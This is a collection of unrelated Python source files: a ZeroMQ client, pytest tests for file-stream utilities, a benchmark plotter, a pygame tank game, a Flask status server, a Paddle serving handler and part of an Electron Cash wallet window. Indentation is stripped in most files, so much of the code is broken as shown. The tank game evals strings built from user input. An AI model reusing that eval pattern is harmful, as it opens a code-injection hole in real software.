if self._last_req_endpoint:
if self._req_socket:
self._req_socket.close()
self._req_socket = self._ctx.socket(zmq.REQ)
self._req_socket.setsockopt(zmq.LINGER, 1)
self._req_socket.setsockopt(zmq.RCVTIMEO, self._req_timeout)
self._req_socket.connect(self._last_req_endpoint)
log.debug(f"Connected REQ socket to endpoint: {self._last_req_endpoint}")
def _reset_sub_socket(self):
if self._last_sub_endpoint:
self._sub_socket.close()
self._sub_socket = self._ctx.socket(zmq.SUB)
self._sub_socket.connect(self._last_sub_endpoint)
self._sub_socket.setsockopt(zmq.RCVTIMEO, self._async_timeout)
log.debug(f"Reconnected SUB socket to endpoint {self._last_sub_endpoint}")
def close(self):
if self._async_th:
self._exit = True
log.debug('Set to exit loop')
self._async_th.join()
log.debug('Joined pubsub thread')
self.connected = False
if self._req_socket:
self._req_socket.close(linger=1)
self._req_socket = None
# self._sub_socket is closed when leaving the thread
if self._ctx:
self._ctx = None
def async_subscribe(self, topic, callback):
self._async_queue.put((topic, callback))
def _proc_async_queue(self):
while True:
try:
topic, callback = self._async_queue.get(block=False)
except queue.Empty:
return
else:
try:
self._async_subscribe(topic, callback)
except:
log.exception(f"Failed to register callback to topic '{topic}'")
def _async_subscribe(self, topic, callback):
"""
This is called from the async thread
"""
if self._async_enabled:
# log.debug(f"Petition to subscribe cb '{callback.__class__.__name__}' to topic '{topic}' ")
if not isinstance(topic, bytes):
topic = topic.encode('utf-8')
self._as.new_topic(topic)
if not issubclass(type(callback), AsyncCallback):
raise Exception("callback must be of type AsyncCallback")
if topic not in self._callbacks:
self._callbacks[topic] = []
self._callbacks[topic].append(callback)
self._sub_socket.subscribe(topic)
self._as.cb_reg(topic)
log.debug(f"Subscribed cb '{callback.__class__.__name__}' to topic '{topic}'")
log.debug(f"Currently, there are {len(self._callbacks[topic])} callbacks on topic '{topic}'")
else:
log.error(f"Tried to subscribe to topic '{topic}' but async is not enabled")
def _process_callbacks(self, topic, async_msg):
if topic in self._callbacks:
for cb in self._callbacks[topic]:
try:
cb.run(topic, async_msg)
self._as.cb_call(topic)
except:
log.exception(f"Exception when executing callback for topic '{topic}'")
self._as.exception(topic)
else:
self._as.unknown_topic(topic)
def async_loop(self):
if self._async_enabled:
if not self._sub_socket:
raise Exception('Async socket not initialized')
while not self._exit:
self._proc_async_queue()
try:
# topic, msg_bytes = self._sub_socket.recv_multipart()
topic = None
recv_bytes = self._sub_socket.recv()
try:
topic, async_msg = AsyncMSG.sub_deserialize(recv_bytes)
# log.debug(f"Received async for topic '{topic}'")
except:
log.exception(f"Could not recover AsyncMSG. Received: {recv_bytes}")
self._as.bad_msg(topic)
continue
else:
self._process_callbacks(topic=topic, async_msg=async_msg)
except zmq.error.Again:
# self._reset_sub_socket()
continue
log.info('Out of pubsub loop')
if self._sub_socket:
self._sub_socket.close()
self._sub_socket = None
log.info('Closed sub socket')
else:
log.error('Async loop was executed but async is not enabled')
def start(self):
self._exit = False
if self._async_enabled:
self._async_th = threading.Thread(target=self.async_loop)
self._async_th.start()
log.info("Started pubsub thread")
else:
log.error('Async is not enabled, can\'t start its thread')
def _command(self, cmd):
"""Send a CommandMSG to the server"""
if not issubclass(type(cmd), CommandMSG):
log.debug('Bad command, command should be of type CommandMSG')
raise Exception("Bad command, command should be of type CommandMSG")
try:
self._req_socket.send(cmd.as_bytes)
ans_bytes = self._req_socket.recv()
except zmq.error.Again:
self._create_or_reset_req_socket()
raise
# log.debug(f"Received answer from server for command '{cmd.command}")
return MessageBase.from_bytes(ans_bytes)
def get_async_stats(self):
return self._as.as_json()
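# Usage sketch (endpoints fall back to the module Defaults; the topic name in
# the commented line is an illustrative assumption):
if __name__ == '__main__':
    client = zmqClient()
    client.connect(ip='localhost')
    client.start()  # spawns the pubsub thread when async is enabled
    # client.async_subscribe('status', my_callback)  # my_callback: an AsyncCallback subclass
    client.close()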
|
test_file_utils.py | import asyncio
import io
import os
import threading
from typing import AsyncGenerator
import pytest
from contaxy.utils.file_utils import (
FileStreamWrapper,
FormMultipartStream,
SyncFromAsyncGenerator,
)
@pytest.fixture()
def metadata() -> dict:
return {
"filename": "test.csv",
"headers": {
"content-type": "multipart/form-data; boundary=----WebKitFormBoundaryr1D8WqBUjhPTDqlM"
},
"hash": "8fec240e6375b677643833f672cfbc5c",
"content_type": "text/csv",
}
@pytest.fixture()
def multipart_data(metadata: dict) -> dict:
stream = b'------WebKitFormBoundaryr1D8WqBUjhPTDqlM\r\nContent-Disposition: form-data; name="file"; filename="test.csv"\r\nContent-Type: text/csv\r\n\r\n'
stream += 5000 * b"foo;bar\n"
stream += b"\r\n------WebKitFormBoundaryr1D8WqBUjhPTDqlM--\r\n"
metadata.update({"stream": io.BytesIO(stream)})
return metadata
@pytest.fixture()
def file_data(metadata: dict) -> dict:
metadata.update({"stream": io.BytesIO(5000 * b"foo;bar\n")})
return metadata
@pytest.mark.unit
class TestFormMultipartStream:
def test_multipart_stream(self, multipart_data: dict) -> None:
file_stream = multipart_data.get("stream")
assert file_stream
multipart_stream = FormMultipartStream(
file_stream, multipart_data.get("headers"), hash_algo="md5"
)
assert multipart_stream.filename == multipart_data.get("filename")
assert multipart_stream.content_type == multipart_data.get("content_type")
with open(os.devnull, "wb") as file:
while True:
chunk = multipart_stream.read(10 * 1024)
if not chunk:
break
file.write(chunk)
assert multipart_stream.hash == multipart_data.get("hash")
@pytest.mark.unit
class TestSyncFromAsyncGenerator:
def test_iteration(self) -> None:
data = list(range(5))
async def iterate(data: list) -> AsyncGenerator:
for element in data:
yield element
async_generator = iterate(data)
loop = asyncio.new_event_loop()
t = threading.Thread(target=loop.run_forever, daemon=True)
t.start()
sync_generator = SyncFromAsyncGenerator(async_generator, loop)
iterated_data = [element for element in sync_generator]
loop.stop()
assert data == iterated_data
@pytest.mark.unit
class TestFileStreamWrapper:
def test_file_stream_wrapper(self, file_data: dict) -> None:
wrapped_file_stream = FileStreamWrapper(file_data.get("stream"))
initial_hash = wrapped_file_stream.hash
while True:
chunk = wrapped_file_stream.read(10 * 1024)
if not chunk:
break
assert initial_hash != wrapped_file_stream.hash
assert wrapped_file_stream.hash == file_data.get("hash")
|
plot_benchmarks.py | #!/usr/bin/env python3
# Copyright Hans Dembinski 2019
# Distributed under the Boost Software License, Version 1.0.
# See accompanying file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt
from matplotlib import pyplot as plt, lines
import shelve
from collections import defaultdict
from run_benchmarks import get_commits, run
import numpy as np
import threading
thread = None
current_index = 0
commits, comments = get_commits()
def get_benchmarks(results):
benchmarks = defaultdict(lambda: [])
for hash in commits:
if hash in results and results[hash] is not None:
benchs = results[hash]
for b in benchs["benchmarks"]:
name = b["name"]
time = min(b["cpu_time"], b["real_time"])
benchmarks[name].append((commits.index(hash), time))
return benchmarks
with shelve.open("benchmark_results") as results:
benchmarks = get_benchmarks(results)
fig, ax = plt.subplots(4, 1, figsize=(10, 10), sharex=True)
plt.subplots_adjust(hspace=0, top=0.98, bottom=0.05, right=0.96)
plt.sca(ax[0])
for name, xy in benchmarks.items():
if "uniform" in name:
continue
if "_1d" in name:
x, y = np.transpose(xy)
plt.plot(x, y, ".-", label=name)
plt.legend(fontsize="xx-small")
plt.sca(ax[1])
for name, xy in benchmarks.items():
if "uniform" in name:
continue
if "_2d" in name:
x, y = np.transpose(xy)
plt.plot(x, y, ".-", label=name)
plt.legend(fontsize="xx-small")
plt.sca(ax[2])
for name, xy in benchmarks.items():
if "uniform" in name:
continue
if "_3d" in name:
x, y = np.transpose(xy)
plt.plot(x, y, ".-", label=name)
plt.legend(fontsize="xx-small")
plt.sca(ax[3])
for name, xy in benchmarks.items():
if "uniform" in name:
continue
if "_6d" in name:
x, y = np.transpose(xy)
plt.plot(x, y, ".-", label=name)
plt.legend(fontsize="xx-small")
plt.figtext(
0.01, 0.5, "time per loop / ns [smaller is better]", rotation=90, va="center"
)
def format_coord(x, y):
global current_index
current_index = max(0, min(int(x + 0.5), len(commits) - 1))
hash = commits[current_index]
comment = comments[hash]
return f"{hash} {comment}"
for axi in ax.flatten():
axi.format_coord = format_coord
def on_key_press(event):
global thread
if thread and thread.is_alive():
return
if event.key != "u":
return
hash = commits[current_index]
def worker(fig, ax, hash):
with shelve.open("benchmark_results") as results:
run(results, comments, hash, True)
benchmarks = get_benchmarks(results)
for name in benchmarks:
xy = benchmarks[name]
x, y = np.transpose(xy)
for axi in ax.flatten():
for artist in axi.get_children():
if isinstance(artist, lines.Line2D) and artist.get_label() == name:
artist.set_xdata(x)
artist.set_ydata(y)
fig.canvas.draw()
thread = threading.Thread(target=worker, args=(fig, ax, hash))
thread.start()
fig.canvas.mpl_connect("key_press_event", on_key_press)
plt.show()
|
Main.py | #!/usr/bin/python3
import pygame, sys, random
from pygame.locals import *
import multiprocessing
import colorama
import sys
#from multiprocessing import Process, Queue
import Tasks
from Tank import *
from Tree import *
from Train import *
from Lake import *
from Tracks import *
from Sheep import *
from Fence import *
from Boat import *
from Path import *
from House import *
from Command import *
pygame.init()
colorama.init()
FPS = 30
WHITE = (255, 255, 255)
YELLOW = (200,200,0)
#ERRORDISPLAY = 1
WIDTH = 900
HEIGHT = 600
fpsClock = pygame.time.Clock()
DISPLAYSURF = pygame.display.set_mode((WIDTH, HEIGHT), 0, 32)
pygame.display.set_caption('tank game')
def gamePrint(text):
print(colorama.Fore.YELLOW + text + colorama.Style.RESET_ALL)
def make_trees(trees,quantity,min_x,max_x,min_y,max_y):
for t in range(quantity):
trees.append(Tree( int(random.random()*(max_x-min_x)) + min_x,
int(random.random()*(max_y-min_y)) + min_y,
'light' if random.random() > 0.5 else 'dark'
))
tank = Tank(300,500)
lake = Lake(0,0)
path = Path(0,0)
tracks = Tracks(0,0)
house = House(610, 240)
trees = []
make_trees(trees,30,0,400,0,200)
make_trees(trees,15,0,180,300,480)
sheepes = [ #XD
Sheep(800,390, 'left'),
Sheep(820,450, 'left'),
Sheep(750,500, 'right'),
Sheep(890,430, 'right'),
Sheep(900,480, 'right')
]
fences = [
Fence(770,550,2),
Fence(700,500,1),
Fence(650,450,2),
Fence(640,380,3),
Fence(685,325,4),
Fence(770,300,5),
Fence(855,310,6)
]
boats = [
Boat(800,10),
Boat(700,30, pos = 'right')
]
train = Train(FPS)
ammobox = AmmoBox(25, 530)
fuel = Fuel(110, 530)
introText = '''\
Welcome to the tank simulation game. You control
the tank via this command line. Type a command
in natural language to give an order.
Type one command at a time. You can use either
simple or more complex sentences.
You don't have any particular goal to achieve.
Just make some noise and try to feel like
a real tank crewman.
'''
def run_game(userInput,received,isDead):
tasklist = []
while True:
if received.value:
            message = userInput.get()  # read from the queue passed in as a parameter
            if message == 'exit':
                pygame.quit()
                sys.exit()
            received.value = 0
            if tank.exist:
                if len(tasklist) != 0:
                    gamePrint('Aborting current action')
                tasklist = eval('Tasks.' + message) if message else []
if tank.exist and tasklist != []: eval(tasklist.pop(0))
if random.random() < 0.0005: make_trees(trees,1,0,400,0,200)
if random.random() < 0.0005: make_trees(trees,1,0,180,300,480)
for sheep in sheepes:
sheep.move()
sheep.turnIfCollide()
for target in Target.targets:
if tank.exist and Target.detectCollison(target, tank):
Target.delete(target)
for bullet in Bullet.bullets:
if Target.detectCollison(target, bullet):
Target.delete(target)
bullet.remove()
DISPLAYSURF.fill(YELLOW)
for target in Target.targets:
target.display(DISPLAYSURF)
for flash in Destroyed.destroyed:
flash.display(DISPLAYSURF)
for bullet in Bullet.bullets:
bullet.move()
bullet.display(DISPLAYSURF)
ammobox.refillAmmoIfCollison(tank)
ammobox.display(DISPLAYSURF)
fuel.refillFuelIfCollison(tank)
fuel.display(DISPLAYSURF)
        if tank.exist:
tank.detectWaterCollision(lake)
tank.display(DISPLAYSURF)
else:
            if not tank.youDiedMassage:
gamePrint("Sorry, You died.")
gamePrint("Type anything to exit")
isDead.value = 1
tasklist = []
tank.youDiedMassage = True
train.move()
train.display(DISPLAYSURF)
for event in pygame.event.get():
if event.type == QUIT:
pygame.display.quit()
pygame.quit()
sys.exit()
pygame.display.update()
fpsClock.tick(FPS)
UserInput = multiprocessing.Queue()
received = multiprocessing.Value('i',0)
isDead = multiprocessing.Value('i',0)
game = multiprocessing.Process(target=run_game, args=(UserInput,received,isDead,))
game.start()
gamePrint(introText)
while True:
if isDead.value == 1:
gamePrint("Sorry, you died. You can't give any orders")
gamePrint("Type anything to exit")
UserInput.put('exit')
received.value = 1
sys.exit()
    message = input()
    if message:
        if message == 'exit' and isDead.value == 0:
            UserInput.put('exit')
            received.value = 1
            sys.exit()
            break
        if isDead.value == 0:
            command = Command(message)
sendToGame = command.interpret()
received.value = 1
UserInput.put(sendToGame)
|
status_server.py | from waitress import serve
from flask import Flask, request
import threading
import http
class StatusServer(object):
def __init__(self):
self.source_done = threading.Event()
self.source_error_event = threading.Event()
self._source_error_message = None
self.sink_done = threading.Event()
self.thread = threading.Thread(target=self.run, args=())
self.thread.daemon = True
self.thread.start()
def run(self):
app = Flask(__name__)
app.add_url_rule('/', view_func=self.get_handler, methods=["GET"])
app.add_url_rule('/source_done', view_func=self.source_done_handler, methods=["PUT"])
app.add_url_rule('/source_error', view_func=self.source_error_handler, methods=["PUT"])
serve(
app,
host="0.0.0.0",
port=8889,
threads=1,
)
def get_handler(self):
if self.source_error_event.is_set():
return 'error', http.HTTPStatus.OK
if not self.source_done.is_set():
return 'receiving', http.HTTPStatus.OK
if not self.sink_done.is_set():
return 'sending', http.HTTPStatus.OK
return 'done', http.HTTPStatus.OK
def source_error_handler(self):
self.source_error_event.set()
self._source_error_message = request.data.decode()
return '', http.HTTPStatus.OK
def source_done_handler(self):
self.source_done.set()
return '', http.HTTPStatus.OK
@property
def source_error_message(self):
if not self.source_error_event.is_set():
return None
return self._source_error_message
@property
def source_sent_all_data(self):
return self.source_done.is_set()
def wait_for_source_sent_all_data(self):
self.source_done.wait()
@property
def sink_received_all_data(self):
return self.sink_done.is_set()
def mark_sink_received_all_data(self):
self.sink_done.set()
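# Usage sketch: the server listens on the hard-coded port 8889; a PUT to
# /source_done moves the reported status from 'receiving' to 'sending'.
if __name__ == '__main__':
    status = StatusServer()
    status.wait_for_source_sent_all_data()  # blocks until PUT /source_done
    status.mark_sink_received_all_data()    # GET / now reports 'done'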
|
local_service_handler.py | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import logging
import multiprocessing
#from paddle_serving_server import OpMaker, OpSeqMaker
#from paddle_serving_server import Server as GpuServer
#from paddle_serving_server import Server as CpuServer
from . import util
#from paddle_serving_app.local_predict import LocalPredictor
_LOGGER = logging.getLogger(__name__)
_workdir_name_gen = util.NameGenerator("workdir_")
class LocalServiceHandler(object):
"""
    LocalServiceHandler is the processor of the local service. It supports
    three client types: brpc, grpc and local_predictor. If you use brpc or
    grpc, serving startup ability is provided. If you use local_predictor,
    local predict ability is provided by paddle_serving_app.
"""
def __init__(self,
model_config,
client_type='local_predictor',
workdir="",
thread_num=2,
device_type=-1,
devices="",
fetch_names=None,
mem_optim=True,
ir_optim=False,
available_port_generator=None,
use_profile=False):
"""
Initialize the LocalServiceHandler.
Args:
    model_config: model config path
    client_type: one of brpc, grpc or local_predictor (default)
    workdir: working directory
    thread_num: number of concurrent threads
    device_type: device selector. -1=not set, determined by
        `devices`. 0=CPU, 1=GPU, 2=TensorRT, 3=ARM CPU, 4=Kunlun XPU
    devices: comma-separated GPU id list; "" (default) means CPU
    fetch_names: fetch names exposed by LocalServiceHandler in
        local_predictor mode; kept compatible with Client().
    mem_optim: enable memory/graphics-memory optimization, True by default.
    ir_optim: enable IR (computation graph) optimization, False by default.
    available_port_generator: generator of available ports
    use_profile: enable profiling, False by default.
Returns:
None
"""
if available_port_generator is None:
available_port_generator = util.GetAvailablePortGenerator()
self._model_config = model_config
self._port_list = []
self._device_name = "cpu"
self._use_gpu = False
self._use_trt = False
self._use_lite = False
self._use_xpu = False
if device_type == -1:
# device_type is not set, determined by `devices`,
if devices == "":
# CPU
self._device_name = "cpu"
devices = [-1]
else:
# GPU
self._device_name = "gpu"
self._use_gpu = True
devices = [int(x) for x in devices.split(",")]
elif device_type == 0:
# CPU
self._device_name = "cpu"
devices = [-1]
elif device_type == 1:
# GPU
self._device_name = "gpu"
self._use_gpu = True
devices = [int(x) for x in devices.split(",")]
elif device_type == 2:
# Nvidia Tensor RT
self._device_name = "gpu"
self._use_gpu = True
devices = [int(x) for x in devices.split(",")]
self._use_trt = True
elif device_type == 3:
# ARM CPU
self._device_name = "arm"
devices = [-1]
self._use_lite = True
elif device_type == 4:
# Kunlun XPU
self._device_name = "arm"
devices = [int(x) for x in devices.split(",")]
self._use_lite = True
self._use_xpu = True
else:
    _LOGGER.error(
        "LocalServiceHandler initialization failed. Unsupported "
        "device_type={}".format(device_type))
    raise ValueError("Unsupported device_type: {}".format(device_type))
if client_type == "brpc" or client_type == "grpc":
for _ in devices:
self._port_list.append(available_port_generator.next())
_LOGGER.info("Create ports for devices:{}. Port:{}"
.format(devices, self._port_list))
self._client_type = client_type
self._workdir = workdir
self._devices = devices
self._thread_num = thread_num
self._mem_optim = mem_optim
self._ir_optim = ir_optim
self._local_predictor_client = None
self._rpc_service_list = []
self._server_pros = []
self._use_profile = use_profile
self._fetch_names = fetch_names
_LOGGER.info(
"Models({}) will be launched by device {}. use_gpu:{}, "
"use_trt:{}, use_lite:{}, use_xpu:{}, device_type:{}, devices:{}, "
"mem_optim:{}, ir_optim:{}, use_profile:{}, thread_num:{}, "
"client_type:{}, fetch_names:{}".format(
model_config, self._device_name, self._use_gpu, self._use_trt,
self._use_lite, self._use_xpu, device_type, self._devices,
self._mem_optim, self._ir_optim, self._use_profile,
self._thread_num, self._client_type, self._fetch_names))
def get_fetch_list(self):
return self._fetch_names
def get_port_list(self):
return self._port_list
def get_client(self, concurrency_idx):
"""
Only used in the local_predictor case: creates one LocalPredictor
object and initializes the paddle predictor via load_model_config.
The concurrency_idx selects which device to run on.
Args:
concurrency_idx: process/thread index
Returns:
_local_predictor_client
"""
# Check that concurrency_idx is valid.
device_num = len(self._devices)
if device_num <= 0:
    _LOGGER.error("device_num must be greater than 0. devices({})".
                  format(self._devices))
    raise ValueError("self._devices is empty")
if concurrency_idx < 0:
    _LOGGER.error("concurrency_idx({}) must be a non-negative number; "
                  "falling back to 0".format(concurrency_idx))
    concurrency_idx = 0
elif concurrency_idx >= device_num:
concurrency_idx = concurrency_idx % device_num
_LOGGER.info("GET_CLIENT : concurrency_idx={}, device_num={}".format(
concurrency_idx, device_num))
from paddle_serving_app.local_predict import LocalPredictor
if self._local_predictor_client is None:
self._local_predictor_client = LocalPredictor()
self._local_predictor_client.load_model_config(
model_path=self._model_config,
use_gpu=self._use_gpu,
gpu_id=self._devices[concurrency_idx],
use_profile=self._use_profile,
thread_num=self._thread_num,
mem_optim=self._mem_optim,
ir_optim=self._ir_optim,
use_trt=self._use_trt,
use_lite=self._use_lite,
use_xpu=self._use_xpu)
return self._local_predictor_client
def get_client_config(self):
return os.path.join(self._model_config, "serving_server_conf.prototxt")
def _prepare_one_server(self, workdir, port, gpuid, thread_num, mem_optim,
ir_optim):
"""
According to self._device_name, generate one CPU/GPU/ARM Server and
set its model config and startup params.
Args:
workdir: work directory
port: network port
gpuid: gpu id
thread_num: thread num
mem_optim: use memory/graphics memory optimization
ir_optim: use calculation chart optimization
Returns:
server: CpuServer/GpuServer
"""
# CPU, GPU and ARM all use the same Server/OpMaker classes here, so the
# op sequence can be built once for every device kind.
from paddle_serving_server import OpMaker, OpSeqMaker, Server
op_maker = OpMaker()
read_op = op_maker.create('general_reader')
general_infer_op = op_maker.create('general_infer')
general_response_op = op_maker.create('general_response')
op_seq_maker = OpSeqMaker()
op_seq_maker.add_op(read_op)
op_seq_maker.add_op(general_infer_op)
op_seq_maker.add_op(general_response_op)
server = Server()
if self._device_name != "cpu" and gpuid >= 0:
    # gpu or arm
    server.set_gpuid(gpuid)
# TODO: support arm or arm + xpu later
server.set_device(self._device_name)
server.set_op_sequence(op_seq_maker.get_op_sequence())
server.set_num_threads(thread_num)
server.set_memory_optimize(mem_optim)
server.set_ir_optimize(ir_optim)
server.load_model_config(self._model_config)
server.prepare_server(
workdir=workdir, port=port, device=self._device_name)
if self._fetch_names is None:
self._fetch_names = server.get_fetch_list()
return server
def _start_one_server(self, service_idx):
"""
Start one server
Args:
service_idx: server index
Returns:
None
"""
self._rpc_service_list[service_idx].run_server()
def prepare_server(self):
"""
Prepare all servers to be started and append them to the list.
"""
for i, device_id in enumerate(self._devices):
if self._workdir != "":
workdir = "{}_{}".format(self._workdir, i)
else:
workdir = _workdir_name_gen.next()
self._rpc_service_list.append(
self._prepare_one_server(
workdir,
self._port_list[i],
device_id,
thread_num=self._thread_num,
mem_optim=self._mem_optim,
ir_optim=self._ir_optim))
def start_server(self):
"""
Start multiple processes and start one server in each process
"""
for i, _ in enumerate(self._rpc_service_list):
p = multiprocessing.Process(
target=self._start_one_server, args=(i, ))
p.daemon = True
self._server_pros.append(p)
for p in self._server_pros:
p.start()
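# A minimal usage sketch (assumptions: paddle_serving_server is installed
# and "./uci_housing_model" is a hypothetical exported serving model dir).
if __name__ == "__main__":
    handler = LocalServiceHandler(
        model_config="./uci_housing_model",
        client_type="brpc",   # brpc/grpc also start the serving servers
        device_type=0,        # force CPU; `devices` stays "" -> [-1]
        thread_num=2)
    handler.prepare_server()  # builds one Server per entry in `devices`
    handler.start_server()    # launches each server in a daemon process
    print("serving on ports:", handler.get_port_list())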
|
main_window.py | #!/usr/bin/env python3
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import base64
import copy
import csv
import json
import os
import shutil
import sys
import threading
import time
import traceback
from decimal import Decimal as PyDecimal # Qt 5.12 also exports Decimal
from functools import partial
from collections import OrderedDict
from typing import List
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
from electroncash import keystore, get_config
from electroncash.address import Address, ScriptOutput
from electroncash.bitcoin import COIN, TYPE_ADDRESS, TYPE_SCRIPT
from electroncash import networks
from electroncash.plugins import run_hook
from electroncash.i18n import _, ngettext, pgettext
from electroncash.util import (format_time, format_satoshis, PrintError,
format_satoshis_plain, NotEnoughFunds,
ExcessiveFee, UserCancelled, InvalidPassword,
bh2u, bfh, format_fee_satoshis, Weak,
print_error)
import electroncash.web as web
from electroncash import Transaction
from electroncash import util, bitcoin, commands, cashacct
from electroncash import paymentrequest
from electroncash.transaction import OPReturn
from electroncash.wallet import Multisig_Wallet, sweep_preparations
from electroncash.contacts import Contact
try:
from electroncash.plot import plot_history
except:
plot_history = None
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, BTCSatsByteEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .popup_widget import ShowPopupLabel, KillPopupLabel
from . import cashacctqt
from .util import *
try:
# pre-load QtMultimedia at app start, if possible
# this is because lazy-loading it from within Python
# callbacks led to crashes on Linux, likely due to
# bugs in PyQt5 (crashes wouldn't happen when testing
# with PySide2!).
from PyQt5.QtMultimedia import QCameraInfo
del QCameraInfo # defensive programming: not always available so don't keep name around
except ImportError as e:
pass # we tried to pre-load it, failure is ok; camera just won't be available
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(Qt.PointingHandCursor)
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
else:
super().keyPressEvent(e)
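# Usage sketch (hypothetical values): a zero-argument callback gets wired
# to both mouse clicks and the Return key, e.g.:
#   btn = StatusBarButton(QIcon(":icons/status_connected.svg"),
#                         _("Network"), self.show_network_dialog)
#   self.statusBar().addPermanentWidget(btn)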
from electroncash.paymentrequest import PR_PAID
class ElectrumWindow(QMainWindow, MessageBoxMixin, PrintError):
# Note: self.clean_up_connections automatically detects signals named XXX_signal and disconnects them on window close.
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
new_fx_quotes_signal = pyqtSignal()
new_fx_history_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
alias_received_signal = pyqtSignal()
history_updated_signal = pyqtSignal()
labels_updated_signal = pyqtSignal() # note this signal occurs when an explicit update_labels() call happens. Interested GUIs should also listen for history_updated_signal as well which also indicates labels may have changed.
on_timer_signal = pyqtSignal() # functions wanting to be executed from timer_actions should connect to this signal, preferably via Qt.DirectConnection
ca_address_default_changed_signal = pyqtSignal(object) # passes cashacct.Info object to slot, which is the new default. Mainly emitted by address_list and address_dialog
status_icon_dict = dict() # app-global cache of "status_*" -> QIcon instances (for update_status() speedup)
def __init__(self, gui_object, wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.wallet = wallet
assert not self.wallet.weak_window
self.wallet.weak_window = Weak.ref(self) # This enables plugins such as CashFusion to keep just a reference to the wallet, but eventually be able to find the window it belongs to.
self.config = config = gui_object.config
assert self.wallet and self.config and self.gui_object
self.network = gui_object.daemon.network
self.fx = gui_object.daemon.fx
self.invoices = wallet.invoices
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.payment_request = None
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.op_return_toolong = False
self.internalpluginsdialog = None
self.externalpluginsdialog = None
self.hardwarewalletdialog = None
self.require_fee_update = False
self.tx_sound = self.setup_tx_rcv_sound()
self.cashaddr_toggled_signal = self.gui_object.cashaddr_toggled_signal # alias for backwards compatibility for plugins -- this signal used to live in each window and has since been refactored to gui-object where it belongs (since it's really an app-global setting)
self.force_use_single_change_addr = None # this is set by the CashShuffle plugin to a single string that will go into the tool-tip explaining why this preference option is disabled (see self.settings_dialog)
self.tl_windows = []
self.tx_external_keypairs = {}
self._tx_dialogs = Weak.Set()
self.tx_update_mgr = TxUpdateMgr(self) # manages network callbacks for 'new_transaction' and 'verified2', and collates GUI updates from said callbacks as a performance optimization
self.is_schnorr_enabled = self.wallet.is_schnorr_enabled # This is a function -- Support for plugins that may be using the 4.0.3 & 4.0.4 API -- this function used to live in this class, before being moved to Abstract_Wallet.
self.send_tab_opreturn_widgets, self.receive_tab_opreturn_widgets = [], [] # defaults to empty list
self._shortcuts = Weak.Set() # keep track of shortcuts and disable them on close
self.create_status_bar()
self.need_update = threading.Event()
self.labels_need_update = threading.Event()
self.decimal_point = config.get('decimal_point', 8)
self.fee_unit = config.get('fee_unit', 0)
self.num_zeros = int(config.get('num_zeros',0))
self.completions = QStringListModel()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
self.converter_tab = self.create_converter_tab()
tabs.addTab(self.create_history_tab(), QIcon(":icons/tab_history.png"), _('History'))
tabs.addTab(self.send_tab, QIcon(":icons/tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, QIcon(":icons/tab_receive.png"), _('Receive'))
# clears/inits the opreturn widgets
self.on_toggled_opreturn(bool(self.config.get('enable_opreturn')))
def add_optional_tab(tabs, tab, icon, description, name, default=True):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), default):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, QIcon(":icons/tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.utxo_tab, QIcon(":icons/tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, QIcon(":icons/tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.converter_tab, QIcon(":icons/tab_converter.svg"), _("Address Converter"), "converter")
add_optional_tab(tabs, self.console_tab, QIcon(":icons/tab_console.png"), _("Con&sole"), "console", False)
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
